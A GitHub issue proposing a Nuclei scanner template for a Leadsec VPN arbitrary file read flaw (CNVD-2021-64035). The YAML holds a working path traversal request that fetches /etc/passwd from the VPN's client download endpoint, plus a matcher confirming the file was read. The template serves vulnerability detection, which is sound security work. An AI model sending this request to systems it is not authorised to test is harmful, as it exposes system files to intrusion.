### ISSUE TITLE
CNVD-2021-64035 Leadsec VPN Arbitrary File Read

### ISSUE THREAD

**Issue by xiaoWangSec** [projectdiscovery/nuclei-templates#10211]
### Template Information:

There is an arbitrary file reading vulnerability in Leadsec VPN, and an attacker can construct a specific URL to achieve arbitrary file reading.
Reference : [CNVD-2021-64035](https://www.cnvd.org.cn/flaw/show/CNVD-2021-64035)
[AVD-2021-888761](https://avd.aliyun.com/detail?id=AVD-2021-888761)

### Nuclei Template:

```yaml
id: CNVD-2021-64035

info:
  author: xiaoWangSec
  name: Leadsec VPN Arbitrary File Read
  severity: high
  description: There is an arbitrary file reading vulnerability in Leadsec VPN, and an attacker can construct a specific URL to achieve arbitrary file reading.

http:
  - method: GET
    path:
      - "{{BaseURL}}/vpn/user/download/client?ostype=../../../../../../../../../etc/passwd"
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"
```
